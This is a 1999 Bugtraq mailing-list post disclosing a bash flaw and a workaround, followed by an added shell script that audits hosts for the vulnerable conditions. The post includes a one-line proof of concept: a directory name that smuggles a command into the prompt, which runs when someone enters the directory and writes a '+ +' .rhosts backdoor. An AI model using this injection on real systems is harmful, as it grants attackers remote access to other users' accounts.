Bugtraq mailing list archives
Re: Bash Bug
From: achurch () DRAGONFIRE NET (Andy Church)
Date: Wed, 21 Apr 1999 20:39:48 EDT
Figured while everyone was working with bash, I might as well make this one public (I apologize if this is old news, apparently it hasn't been fixed if so). If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " and someone cd's into said directory, either by accident, or whatever, then it will cause it to actually execute.
Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe. As a workaround, use `pwd`
in place of \w.
Tested with bash 1.14 (it's the only one I have handy).
--Andy Church
achurch () dragonfire net
http://achurch.dragonfire.net/
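The two conditions described in the message above (a prompt that uses \w or \W, and a directory name carrying a command substitution) can be checked for on a host. The following is an added example, not part of the original post; the function names are hypothetical, and it goes slightly beyond the post by also flagging `$(`, the other command-substitution syntax.

```shell
#!/bin/sh
# Added example: audit for the conditions under which a directory name
# could reach the prompt expansion described above. Names are hypothetical.

# Return 0 if the prompt string passed as $1 uses the \w or \W escape.
prompt_uses_cwd_escape() {
    case "$1" in
        *'\w'*|*'\W'*) return 0 ;;
        *) return 1 ;;
    esac
}

# Run find over directories below $1 whose names contain a backquote
# or "$(". Remaining arguments are the find action to apply.
find_suspicious_dirs() {
    root=$1
    shift
    find "$root" -type d \( -name '*`*' -o -name '*$(*' \) "$@" 2>/dev/null
}

# Print how many such directories exist. One line is emitted per match,
# so names that themselves contain newlines are still counted once.
count_suspicious_dirs() {
    find_suspicious_dirs "$1" -exec echo x \; | wc -l | tr -d ' '
}

# Report on tree $1 for prompt string $2. Returns 1 only when both
# conditions from the post hold, 0 otherwise.
audit_prompt_risk() {
    n=$(count_suspicious_dirs "$1")
    if prompt_uses_cwd_escape "$2" && [ "$n" -gt 0 ]; then
        echo "prompt expands the working directory and $n suspicious name(s) exist:"
        find_suspicious_dirs "$1" -print
        return 1
    fi
    echo "no exposure found ($n suspicious name(s), prompt checked)"
    return 0
}
```

Call it from the interactive shell as `audit_prompt_risk /home "$PS1"`, since PS1 is normally not exported to child processes.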
